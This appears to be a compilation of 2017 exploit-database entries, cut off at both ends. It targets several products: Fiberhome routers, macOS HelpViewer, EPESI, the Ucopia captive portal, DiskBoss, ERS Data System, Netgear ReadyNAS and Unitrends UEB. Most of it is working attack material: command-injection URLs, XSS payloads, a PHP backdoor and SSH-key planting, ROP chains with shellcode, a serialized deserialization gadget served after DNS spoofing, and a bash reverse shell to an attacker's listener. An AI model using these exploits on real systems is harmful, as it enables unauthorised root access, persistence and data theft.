13 00 08 01 00 00 00 00 00 00 01 00 00 00 61 00
08 08 08 08 08 08 08 08 08 13 08 08 08 00 00 00
00 00 00 00 00 00 6f 29 fb ff ff ff 00 29 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 02 8d 00 00 00 f9 00 00 00 00 00 00 00 00
00 00 00 00 00 01 00 00 00 00 00 00 01 ff ff 00
35 13 00 00 00 00 00 b6 00 00 13 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 05
01 20 00 01
'''.replace(' ', '').replace('\n', '').decode('hex')
return data
if __name__ == '__main__':
if len(sys.argv) != 3:
print 'Usage: %s <ip> <port>' % sys.argv[0]
sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])
packet = negative_size_param()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST, 1)
s.sendto(packet, (ip, port))
s.close()
# Exploit Title: Fiberhome an5506-04-f – -PING- COMMAND INJECTION
# Date: 03.10.2017
# Exploit Author: Tauco
# Vendor Homepage: http://hk.fiberhomegroup.com
# Version: RP2609
# Tested on: Windows 10
Description:
===========================================================================
Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application.
https://www.owasp.org/index.php/Command_Injection
Proof of Concepts :
=======================================
1. Go to the Default Gateway
2. Open the application
3. Open diagnosis
4. Input command to the Destination Address
5. Click Ping
ping_ip=127.0.0.1;whoami;id
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.617 ms
64 bytes from 127.0.0.1: seq=1 ttl=64 time=0.259 ms
64 bytes from 127.0.0.1: seq=2 ttl=64 time=0.215 ms
64 bytes from 127.0.0.1: seq=3 ttl=64 time=0.214 ms
64 bytes from 127.0.0.1: seq=4 ttl=64 time=0.218 ms
--- 127.0.0.1 ping statistics ---
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 0.214/0.304/0.617 ms
root
uid=0(root) gid=0 groups=0
Title: Mac OS X Local Javascript Quarantine Bypass
Product: Mac OS X
Version: 10.12, 10.11, 10.10 and probably prior
Vendor: apple.com <http://apple.com/>
Type: DOM Based XSS
Risk level: 3 / 5
Credits: filippo.cavallarin@wearesegment.com <mailto:filippo.cavallarin@wearesegment.com>
CVE: N/A
Vendor notification: 2017-07-15
Vendor fix: 2017-09-25
Public disclosure: 2017-09-28
DETAILS
Mac OS X contains a vulnerability that allows the bypass of the Apple Quarantine and the execution of arbitrary
Javascript code without restrictions.
Basically, Apple's Quarantine works by setting an extended attribute to downloaded files (and also to files
extracted from downloaded archive/image) that tells the system to open/execute those files in a restricted
environment. For example, a quarantined html file won't be able to load local resources.
The vulnerability is in one html file, part of the Mac OS X core, that is prone to a DOM Based XSS allowing the
excution of arbitrary javascript commands in its (unrestricted) context.
The mentioned file is located at /System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html
and contains the following code:
<script type="text/javascript" charset="utf-8">
setBasePathFromString(urlParam("rhtml"));
loadLocStrings();
loadJavascriptLibs();
function init () { /* <-- called by <body onload="init()" */
[...]
rHTMLPath = urlParam("rhtml"); /* <-- takes 'rhtml' parameters from current url */
[...]
self.contentHttpReq.open('GET', rHTMLPath, true);
self.contentHttpReq.onreadystatechange = function() {
if (self.contentHttpReq.readyState == 4) {
loadTutorial(self.contentHttpReq.responseText);
}
}
[...]
}
function loadTutorial(response) {
var rHTMLPath = urlParam("rhtml");
// this will create a tutorialData item
eval(response);
[...]
}
function loadLocStrings()
{
var headID = document.getElementsByTagName("head")[0];
var rHTMLPath = urlParam("rhtml");
rHTMLPath = rHTMLPath.replace("metaData.html", "localizedStrings.js");
var newScript = document.createElement('script');
newScript.type = 'text/javascript';
newScript.src = rHTMLPath;
headID.appendChild(newScript);
}
[...]
</script>
In short, it takes an url from the "rhtml" query string parameter, makes a request to that url and evaluates
the response content as javascript code.
The code below contains two different DOM Based XSS.
The first is in the loadLocStrings() function that creates a SCRIPT element and uses the "rhtml" parameter as
its "src" property.
The second is in the init() function that uses the "rhtml" parameter to make an ajax call and then passes the
response directly to eval().
As the result the same payload is executed twice.
An attacker, by providing a data uri, can take control of the response and thus what gets evaluated.
One possile vector of exploitation are the .webloc files. Basically those files contain an url and they simply loads
it in Safari when opened.
By crafting a .webloc file and by tricking a victim to open it, an attacker can run privileged javascript commands on
the victim's computer.
Due to the fact that .webloc files also use an extended attribute to store data, they must be sent contained in a tar
archive (or any other format that supports extended attributes).
PROOF OF CONCEPT
To reproduce the issue follow the steps below:
1. create a javascript file you want to execute on your target
2. convert its content to base64
3. encode it to a "uri component" (ex with encodeURIComponent js function)
4. use it to build a data uri as follow:
data:text/plain;base64,<urlencoded base64>
5. prepend the following string to it:
file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml= <file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml=>
6. open it with Safari
7. save it as a bookmark
8. drag the bookmark to the Finder (a .webloc file is created, if the extension is not .webloc, rename it)
9. create a tar archive containing the .webloc file
10. send it to the victim
Note that due to the behaviour of rhtmlPlayer.html, in order to access local resources, the first line of the
javascript code must be: document.getElementsByTagName("base")[0].href="";
The following bash script will take a javascript file and converts it to final "file" url:
BOF
#!/bin/bash
BASEURL="file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml= <file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml=>"
BASEJS="(function(){document.getElementsByTagName('base')[0].href='';if('_' in window)return;window._=1;"
DATAURI="data:text/plain;base64,"
JSFILE=$1
if [ "$JSFILE" = "" ]; then
echo "usage: $0 <jsfile>"
exit 1
fi
JS=$BASEJS`cat $JSFILE`"})();"
ENCJS=`echo -n $JS | base64 | sed 's/=/%3D/g' | sed 's/+/%2F/g' | sed 's/\//%2B/g'`
URL="$BASEURL""$DATAURI""$ENCJS"
echo -ne "Paste the url below into Safari's url bar:\n\033[33m$URL\033[0m\n"
EOF
The following javascript code will alert the /etc/passwd file on the victim's computer:
BOF
xhr = new XMLHttpRequest();
xhr.open("GET", "/etc/passwd", true);
xhr.onreadystatechange = function(){
if (xhr.readyState == 4) {
alert(xhr.responseText);
}
};
xhr.send();
EOF
Note that only Safari will successfully load local resources via ajax (Chrome and Firefox won't). In this
exploitation process it's not an issue since .webloc files are always opened with Safari.
NOTE
This issue has been silently fixed in Mac OS X High Sierra and (at time of writing) there is no mention of this
bug in Apple's changelog.
No CVE has been assigned by Apple.
SOLUTION
Upgrade to Mac OS X High Sierra or simply remove rhtmlPlayer.html.
Safari 11 (available for Mac OS X 10.11, 10.12 and 10.13) introduces the following security henancement:
"CORS and cross origin access from file:// are now blocked unless Disable Local File Restrictions is selected from the Develop menu"
hence the above exploit will not work against updated versions of OSX El Capitan and Sierra. However javascript execution outside quarantine is still possible.
REFERENCES
https://www.wearesegment.com/research/Mac-OS-X-Local-Javascript-Quarantine-Bypass.html <https://www.wearesegment.com/research/Mac-OS-X-Local-Javascript-Quarantine-Bypass.html>
DISCLOSURE
This vulnerability has been disclosed thru Securiteam Secure Disclosure program: http://www.beyondsecurity.com/ssd <http://www.beyondsecurity.com/ssd>
# Exploit Title: Multiple Stored XSS in EPESI
# Date: 10/03/2017
# Exploit Author: Zeeshan Shaikh
# Vendor Homepage: http://epe.si/
# Software Link: http://epe.si/download/
# Version: 1.8.2 rev20170830
# CVE : CVE-2017-14712 to CVE-2017-14717
# Category: webapps
XSS 1 (Tasks - Title)
Steps to recreate:
1. Home->Tasks->add new
2. Enter title as "MYTITLE" and fill required details but don't click save
3. Start interceptor and intercept request
4. click save
5. Now replace MYTITLE with "<i onclick=alert(1)>alertme</i>"(without
quotes)
6. Home->click on alertme
XSS 2 (Tasks - Description)
Steps to recreate:
1. Create a new task and fill description as "MYDESC" but don't click on
save
2. Start intercepting request and then click save on browser
3. Now replace MYDESC with "<script>alert(1)</script>"
4. Go to Home(make sure task applet is there) -> Mouseover on i icon
XSS 3 (Tasks/Phonecall - Notes - Title)
Steps to recreate:
1. Home->Tasks/PhoneCall->Notes->add new
2. Steps same as XSS 1
3. Click on alertme in notes section
XSS 4 (Tasks - Alerts - Title)
Steps to recreate:
1. Home->Tasks->Notes->add new
2. Steps same as XSS 1
3. Click on alertme in alerts section
XSS 5 (Phonecalls - Subject)
Steps to recreate:
1. Create a new phonecall and fill subject as "MYSUB" but don't click on
save
2. Start intercepting request and then click save on browser
3. Now replace MYSUB with "<script>alert(1)</script>"
4. Go to Home(make sure task applet is there) -> Mouseover on i icon
XSS 6 (Phonecalls - Description)
Same as XSS 5
# Exploit Title: Unauthenticated remote root code execution on captive
portal Ucopia <= 5.1
# Date: 02/10/17
# Exploit Author: agix
# Vendor Homepage: http://www.ucopia.com/
# Version: <= 5.1
# Don't know in which version they exactly fixed it.
# When you connect to Ucopia wifi guest, every requests are redirected to controller.access.network
# First create easier to use php backdoor
https://controller.access.network/autoconnect_redirector.php?client_ip=127.0.0.1;echo%20'<?php system($_GET[0]);%20?>'>/var/www/html/upload/bd.php;echo%20t
# As php is in sudoers without password...
https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system("id");%27
# Just push your ssh key and get nice root access (ssh is open by default even from wifi guest)
https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system("echo%20ssh-rsa%20AAAA[...]%20>>%20/root/.ssh/authorized_keys");%27
#!/usr/bin/python
#========================================================================================================================
# Exploit Author: C4t0ps1s
# Exploit Title: DiskBoss Enterprise v8.4.16 Local Buffer Overflow(Code execution)
# Date: 03-10-2017
# Twitter: @C4t0ps1s
# Email: C4t0ps1s@gmail.com
# Vulnerable Software: DiskBoss Enterprise v8.4.16
# Vendor Homepage: http://www.diskboss.com
# Version: v8.4.16
# Software Link: http://www.diskboss.com/downloads.html
# Tested On: Windows 10 x64
#
# Code execution from the PoC of Touhid M.Shaikh: https://www.exploit-db.com/exploits/42917/
#
# To reproduce the code execution:
# 1. Click Server
# 2. Click Connect
# 3. In the "Share Name" field, paste the content of shareName.txt , And try to connect
#
#========================================================================================================================
import struct
buff = "a"*1312
#push esp | pop esi | retn 4
buff += struct.pack("<L",0x65247445)
#mov eax, esi | pop esi | retn 4
buff += struct.pack("<L",0x65273f24)
buff += "PADD"
buff += "PADD"
#pop ebx | retn
buff += struct.pack("<L",0x65222936)
buff += "PADD"
buff += struct.pack("<L",0x7f7f7f7f)
#add eax, ebx | pop esi | pop ebx | retn 0xc
buff += struct.pack("<L",0x65222d7d)
buff += "PADD"
buff += struct.pack("<L",0x7f7f7f7f)
#add eax, ebx | pop esi | pop ebx | retn 0xc
buff += struct.pack("<L",0x65222d7d)
buff += "PADD"
buff += "PADD"
buff += "PADD"
buff += "PADD"
buff += struct.pack("<L",0x0101015a)
#add eax, ebx | pop esi | pop ebx | retn 0xc
buff += struct.pack("<L",0x65222d7d)
buff += "PADD"
buff += "PADD"
buff += "PADD"
buff += "PADD"
buff += "PADD"
#jmp eax
buff += struct.pack("<L",0x65217d28)
#inc eax
buff += "\x40"*20
#msfvenom -a x86 --platform windows -p windows/exec CMD="calc.exe" -e x86/alpha_mixed BufferRegister=EAX -f raw
sc = "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
sc += "\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
sc += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
sc += "\x42\x75\x4a\x49\x39\x6c\x68\x68\x6e\x62\x45\x50\x75\x50\x37\x70"
sc += "\x31\x70\x6f\x79\x78\x65\x66\x51\x6b\x70\x50\x64\x4e\x6b\x52\x70"
sc += "\x56\x50\x6c\x4b\x51\x42\x44\x4c\x6e\x6b\x43\x62\x55\x44\x6e\x6b"
sc += "\x64\x32\x57\x58\x76\x6f\x68\x37\x42\x6a\x47\x56\x44\x71\x49\x6f"
sc += "\x6c\x6c\x75\x6c\x75\x31\x73\x4c\x73\x32\x76\x4c\x31\x30\x6a\x61"
sc += "\x4a\x6f\x74\x4d\x66\x61\x5a\x67\x38\x62\x4b\x42\x52\x72\x70\x57"
sc += "\x4e\x6b\x52\x72\x66\x70\x6c\x4b\x33\x7a\x35\x6c\x6c\x4b\x42\x6c"
sc += "\x77\x61\x52\x58\x6a\x43\x37\x38\x55\x51\x6b\x61\x33\x61\x4e\x6b"
sc += "\x73\x69\x65\x70\x47\x71\x7a\x73\x6e\x6b\x67\x39\x36\x78\x4b\x53"
sc += "\x75\x6a\x72\x69\x6e\x6b\x45\x64\x4e\x6b\x43\x31\x58\x56\x56\x51"
sc += "\x79\x6f\x6e\x4c\x6b\x71\x6a\x6f\x34\x4d\x43\x31\x39\x57\x65\x68"
sc += "\x39\x70\x71\x65\x7a\x56\x73\x33\x51\x6d\x5a\x58\x45\x6b\x51\x6d"
sc += "\x44\x64\x74\x35\x4d\x34\x30\x58\x4e\x6b\x31\x48\x74\x64\x75\x51"
sc += "\x4a\x73\x65\x36\x4c\x4b\x54\x4c\x32\x6b\x4e\x6b\x36\x38\x57\x6c"
sc += "\x53\x31\x48\x53\x4c\x4b\x75\x54\x4c\x4b\x77\x71\x7a\x70\x4f\x79"
sc += "\x77\x34\x61\x34\x64\x64\x61\x4b\x43\x6b\x61\x71\x43\x69\x71\x4a"
sc += "\x62\x71\x59\x6f\x6b\x50\x61\x4f\x33\x6f\x33\x6a\x6c\x4b\x46\x72"
sc += "\x78\x6b\x4c\x4d\x43\x6d\x73\x5a\x37\x71\x6c\x4d\x6e\x65\x58\x32"
sc += "\x47\x70\x55\x50\x47\x70\x32\x70\x45\x38\x56\x51\x4c\x4b\x42\x4f"
sc += "\x6f\x77\x69\x6f\x4b\x65\x4f\x4b\x78\x70\x6e\x55\x69\x32\x53\x66"
sc += "\x65\x38\x4f\x56\x6c\x55\x4f\x4d\x6d\x4d\x6b\x4f\x4a\x75\x45\x6c"
sc += "\x66\x66\x53\x4c\x75\x5a\x6f\x70\x69\x6b\x69\x70\x42\x55\x53\x35"
sc += "\x6d\x6b\x51\x57\x65\x43\x31\x62\x42\x4f\x71\x7a\x45\x50\x72\x73"
sc += "\x4b\x4f\x78\x55\x35\x33\x35\x31\x32\x4c\x55\x33\x46\x4e\x75\x35"
sc += "\x43\x48\x50\x65\x55\x50\x41\x41"
buff += sc
f = open("shareName.txt","wb")
f.write(buff)
f.close()
# Exploit Title: ERS Data System 1.8.1 Deserialize Vulnerability
# Google Dork: N/A
# Date: 9/21/2017
# Exploit Author: West Shepherd
# Vendor Homepage: http://www.ersdata.com
# Software Link: www.ersdata.com/downloads/ErsSetup.exe
# Version: 1.8.1.0
# Tested on: Windows 7 x86
# CVE : CVE-2017-14702
# Description:
# ERS Data System 1.8.1.0 allows remote attackers to execute arbitrary code, related to the use of
# com.branaghgroup.ecers.update.UpdateRequest deserialization.
# Exploitaiton:
# The ERS Data System thick client connects to the www.ersdata.com API via an unencrypted HTTP connection on TCP port 3311.
# To redirect requests from the thick client to the attacking machine, enable packet forwarding:
#!/bin/bash
#echo 1 > /proc/sys/net/ipv4/ip_forward
#iptables -F INPUT
#iptables -F FORWARD
#iptables -F OUTPUT
#iptables -F -t nat
#iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
#iptables -t nat -A POSTROUTING -s 192.168.85.0/24 ! -d 192.168.85.0/24 -j MASQUERADE
#iptables -P INPUT ACCEPT
#iptables -P FORWARD ACCEPT
#iptables -P OUTPUT ACCEPT
# Then poison DNS requests to the www.ersdata.com domain:
# DNS Spoof https://github.com/devleoper/arp-dns-spoof
# root@kali:/usr/share/arp-dns-spoof# cat dns_packet_spoof.py | egrep "domain =|localIP ="
# domain = 'www.ersdata.com' # domain to be spoofed
# localIP = '192.168.85.131' # IP address for poisoned hosts.
# Run the request handler on the attacking machine, which will answer all requests with malicous serialized gadgets. For example:
#!/usr/bin/python
import SocketServer, sys
from SimpleHTTPServer import SimpleHTTPRequestHandler
# POST Handler
class HTTPHandler(SimpleHTTPRequestHandler):
def __init__(self,req,client_addr,server):
SimpleHTTPRequestHandler.__init__(self,req,client_addr,server)
def do_POST(self):
# java -jar ysoserial-master-v0.0.5-g1f2e7bf-14.jar CommonsCollections1 calc.exe > calc.bin
# python -c 'import binascii, re;print "\\x"+"\\x".join(re.findall("..",binascii.hexlify(open("calc.bin","rb").read())))'
response = ( "\xac\xed\x00\x05\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x71\x00\x7e\x00\x00\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1e\x73\x71\x00\x7e\x00\x16\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1b\x73\x71\x00\x7e\x00\x16\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x08\x63\x61\x6c\x63\x2e\x65\x78\x65\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x01\x71\x00\x7e\x00\x23\x73\x71\x00\x7e\x00\x11\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x71\x00\x7e\x00\x3a"
)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("Content-length", len(response))
self.end_headers()
self.wfile.write(response)
try:
httpd = SocketServer.TCPServer(("", 3311), HTTPHandler)
print "Serving at port: ", 3311
httpd.serve_forever()
except:
print "Exiting..."
# Exploit Netgear ReadyNAS Surveillance 1.4.3-16 Unauthenticated RCE
# Date: 27.09.2017
# Software Link: https://www.netgear.com/
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: remote
1. Description
$_GET['uploaddir'] is not escaped and passed to system() through $tmp_upload_dir.
https://security.szurek.pl/netgear-ready-nas-surveillance-14316-unauthenticated-rce.html
2. Proof of Concept
http://IP/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;sleep%205;%27
# Exploit Title: Unauthenticated root RCE for Unitrends UEB 9.1
# Date: 08/08/2017
# Exploit Authors: Jared Arave, Cale Smith, Benny Husted
# Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413
# Vendor Homepage: https://www.unitrends.com/
# Software Link: https://www.unitrends.com/download/enterprise-backup-software
# Version: 9.1
# Tested on: CentOS6
# CVE: CVE-2017-12477
import socket
import binascii
import struct
import time
import sys
from optparse import OptionParser
print """
###############################################################################
Unauthenticated root RCE for Unitrends UEB 9.1
Tested against appliance versions:
[+] 9.1.0-2.201611302120.CentOS6
This exploit uses roughly the same process to gain root execution
as does the apache user on the Unitrends appliance. The process is
something like this:
1. Connect to xinetd process (it's usually running on port 1743)
2. This process will send something like: '?A,Connect36092'
3. Initiate a second connection to the port specified
in the packet from xinetd (36092 in this example)
4. send a specially crafted packet to xinetd, containing the
command to be executed as root
5. Receive command output from the connection to port 36092
6. Close both connections
NB: Even if you don't strictly need output from your command,
The second connection must still be made for the command
to be executed at all.
###############################################################################
"""
# Parse command line args:
usage = "Usage: %prog -r <appliance_ip> -l <listener_ip> -p <listener_port>\n"\
" %prog -r <appliance_ip> -c 'touch /tmp/foooooooooooo'"
parser = OptionParser(usage=usage)
parser.add_option("-r", '--RHOST', dest='rhost', action="store",
help="Target host w/ UNITRENDS UEB installation")
parser.add_option("-l", '--LHOST', dest='lhost', action="store",
help="Host listening for reverse shell connection")
parser.add_option("-p", '--LPORT', dest='lport', action="store",
help="Port on which nc is listening")
parser.add_option("-c", '--cmd', dest='cmd', action="store",
help="Run a custom command, no reverse shell for you.")
parser.add_option("-x", '--xinetd', dest='xinetd', action="store",
type="int", default=1743,
help="port on which xinetd is running (default: 1743)")
(options, args) = parser.parse_args()
if options.cmd:
if (options.lhost or options.lport):
parser.error("[!] Options --cmd and [--LHOST||--LPORT] are mutually exclusive.\n")
elif not options.rhost:
parser.error("[!] No remote host specified.\n")
elif options.rhost is None or options.lhost is None or options.lport is None:
parser.print_help()
sys.exit(1)
RHOST = options.rhost
LHOST = options.lhost
LPORT = options.lport
XINETDPORT = options.xinetd
if options.cmd:
cmd = options.cmd
else:
cmd = 'bash -i >& /dev/tcp/{0}/{1} 0>&1 &'.format(LHOST, LPORT)
def recv_timeout(the_socket,timeout=2):
the_socket.setblocking(0)
total_data=[];data='';begin=time.time()
while 1:
#if you got some data, then break after wait sec
if total_data and time.time()-begin>timeout:
break
#if you got no data at all, wait a little longer
elif time.time()-begin>timeout*2:
break
try:
data=the_socket.recv(8192)
if data:
total_data.append(data)
begin=time.time()
else:
time.sleep(0.1)
except:
pass
return ''.join(total_data)
